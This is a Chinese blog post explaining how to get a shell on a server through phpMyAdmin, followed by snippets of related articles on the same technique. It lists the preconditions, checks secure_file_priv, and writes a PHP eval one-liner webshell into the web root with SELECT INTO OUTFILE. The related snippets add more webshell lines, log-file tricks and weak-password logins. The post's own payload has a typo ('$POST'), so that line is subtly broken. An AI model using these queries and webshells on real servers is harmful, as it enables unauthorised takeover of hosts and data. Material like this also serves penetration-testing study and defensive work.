phpmyadmin页面getshell

最新推荐文章于 2024-06-25 17:21:43 发布
最新推荐文章于 2024-06-25 17:21:43 发布
阅读量474 收藏 7
点赞数 4
文章标签: adb 网络 安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80520893/article/details/137237250
版权

0x00 前言

来到phpmyadmin页面后如何getshell呢?下面介绍两种方法

0x01 select into outfile直接写入

1、利用条件

  • 对web目录需要有写权限能够使用单引号(root)

  • 知道网站绝对路径(phpinfo/php探针/通过报错等)

  • secure_file_priv没有具体值

2、查看secure_file_priv值

show global variables like '%secure%';

关于secure_file_priv配置介绍:

secure_file_priv 是用来限制 load dumpfile、into outfile、load_file() 函数在哪个目录下拥有上传或者读取文件的权限

当 secure_file_priv 的值为 NULL ,表示限制 mysqld 不允许导入|导出,此时无法提权
当 secure_file_priv 的值为 /tmp/ ,表示限制 mysqld 的导入|导出只能发生在 /tmp/ 目录下,此时也无法提权
当 secure_file_priv 的值没有具体值时,表示不对 mysqld 的导入|导出做限制,此时可提权

我这里的secure_file_priv值为NULL,所以不能够导入或导出

secure_file_priv这个值是只读变量,只能通过配置文件修改。如果管理员没有配置,那么我们是无法进行写入shell的,这里我为了测试能否写入修改一下

在MySQL的配置文件my.ini中进行配置:

修改后secure_file_priv的值如图所示:

3、写入一句话

select '<?php @eval($POST[1]); ?>' INTO OUTFILE 'D:\\phpStudy\\PHPTutorial\\WWW\\a.php'

这里需要注意的一个点是路径需要用"\\"

查看下根目录

网安星星
关注
  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpMyadmin getshell思路
千寻的博客
03-07 613
文章目录一.phpMyadmin简介二.phpMyadmin getshell思路1.流程简述2.信息收集3.获取网站真实路径的作用一免责声明 一.phpMyadmin简介 phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其...
【渗透测试】--- 利用phpmyadmin来getshell
qq_43168364的博客
12-24 655
利用phpmyadmin来getshell有两种方式 1、利用into outfile直接将一句话写入文件中 2、利用Mysql的日志文件getshell 不论是那种方式都要满足以下三个条件: 未限制文件路径 secure_file_priv= 当前用户有写文件权限 知道网站根目录 — C:\phpStudy\PHPTutorial\WWW 第一种方法 select "<?php phpinfo();?>" into outfile "/var/www/html/tes
PhpMyadmin--getshell
qq_64664156的博客
09-20 608
phpMyAdmin通过MySQL日志文件getshell
phpMyAdmin 4.0.10 文件包含 -> getshell
最新发布
2301_80115097的博客
06-25 896
gettype() 获取参数的属性也就是说我们的$var需要是一个数组这里的返回值就是True了还是刚刚说的那些,这里如果是Linux服务器的话,并且sql文件储存路径有大小写的话,就没办法拿到webshell了,并且还不能任意文件包含,还只能包含路径没有大写字符的,反正至少以我目前的水平是不行的,不过 linux 默认mysql文件的路径是 /var/lib/mysql/。默认情况下是无影响的。
phpmyadmin getshell
YouthBelief的博客
11-11 5075
phpmyadmin getshell前言一、into outfile写马条件利用方法操作二、开启日志写马getshell条件利用方法操作三、慢查询webshell利用方法操作四、创建数据库和表写入webshell条件利用方法特殊版本getshell 前言 phpMyadmin是一个以PHP为基础的MySQL数据库管理工具,使网站管理员可通过Web接口管理数据库。 虽然网上有很多公开的文章,也用过很多次了,但自己再总结一遍方便自己查阅。 一、into outfile写马 条件 1.对web目录需要有写权限能
PHPmyadmin Getshell
Grey的博客
07-21 6889
1. phpMyAdmin简介 2. phpMyAdmin getshell思路 3. phpMyAdmin 4.8.1 getshell实战 SHOW VARIABLES LIKE ‘%secure_file_priv%”;   查看读写文件路径 “secure_file_priv”对应的值不能为null,为null就没办法正常写入shell 我们首先需要检测的是MyS...
getshellPhpmyadmin写日志
MoCoCN的博客
08-30 662
@MoCoCN Phpmyadmin写日志getshell 当初接触渗透测试的时候getshell就会个文件上传,后来随着工作学到的知识越来越多,慢慢的getshell的姿势也慢慢的学到了些,这次给大家分享一个很常见也很基础的getshell的方式。如有什么不严谨的地方,还望大佬指点。 1.准备环境 一台装有Phpstudy(mysql>5.0)的服务器 中国蚁剑 2.开启phpstudy 3.访问服务器phpmyadmin页面 4.弱口令root root登录进去,点击SQL,执行sql语句 查
Web渗透测试对靶机注入shellphpMyAdmin
SYJ_361的博客
12-15 3753
在服务器中寻找目标靶机,对靶机进行渗透。这里用到了kali和中国蚁剑对目标进行渗透,用burpsuite对目标登录页面进行暴力破解账号和密码。
phpmyadmin中mysql返回_phpMyAdmin利用小结
weixin_28981373的博客
01-28 396
获取版本信息在phpmyadmin根目录下后面添加:READMEChangeLogdoc/html/index.htmlChangechangelog.phpreadme.phpDocumetation.htmlDocumetation.txttranslators.html在fofa上搜索相应站点进行测试:常规getshell手段:1、SQL注入:看看网站是否存在注入利用注入出来的账号密码登录2...
利用phpMyAdmin拿webshell
05-01
利用phpMyAdmin拿webshell 利用phpMyAdmin拿webshell
phpMyAdmin getshell总结
zzgslh的博客
04-14 751
phpMyAdmin getshell总结 phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。 一、phpMyAdmin写权限(into outfile)getshell 利用条件 1.知道网站绝对路径 2.对web目录具有写入权限 3.secure_ file_ priv没有具体值 ...
第三方应用类---Phpmyadmin 后台 Getshell 操作
金灰的博客
04-21 500
以Web-Base方式架构在网站主机上的MySQL的数据库管理工具.PhpMyAdmin_百度百科。
渗透测试-PhpMyAdmin后台getshell
道阻且长,行则将至。
08-10 5312
在通过对目标进行信息收集探测后,当发现存有phpmyadmin目录时,进而通过弱口令或者暴力破解进入数据库之后,有多种方法进行getshell。 MySQL导出木马 最常用的是通过into outfile直接写入一句话木马: select '<?php eval($_POST[cmd]); ?>' into outfile 'D:/phpStudy/www/xxx.php'; 当然,前...
phpmyadmin getshell总结
越努力 越自由
10-25 3439
phpMyAdmin 是一个用PHP编写的开源软件工具,可以通过web方式控制和操作MySQL数据库。通过phpMyAdmin 可以完全对数据库进行操作,例如建立、复制和删除数据等。
PhpMyAdmin后台getshell
qq_50854662的博客
03-14 1112
PhpMyAdmin简介 PhpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。 在通过对目标进行信息收集探测后,当发现存有phpmyadmin目录(可试下:http://ip:端口/phpmyadmin/ )时,进而通过弱口令(可以直接尝试下账号root密码root)或者暴力破解进入管理后台之后,有
phpmyadmin页面404
08-26
您可以通过运行命令sudo apt-get install phpmyadmin来安装PhpMyAdmin。 2. 检查您的Apache2配置文件是否正确。您可以根据参考资料中的指南来进行Apache2配置目录的分析,确保配置文件中正确指定了PhpMyAdmin的路径...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值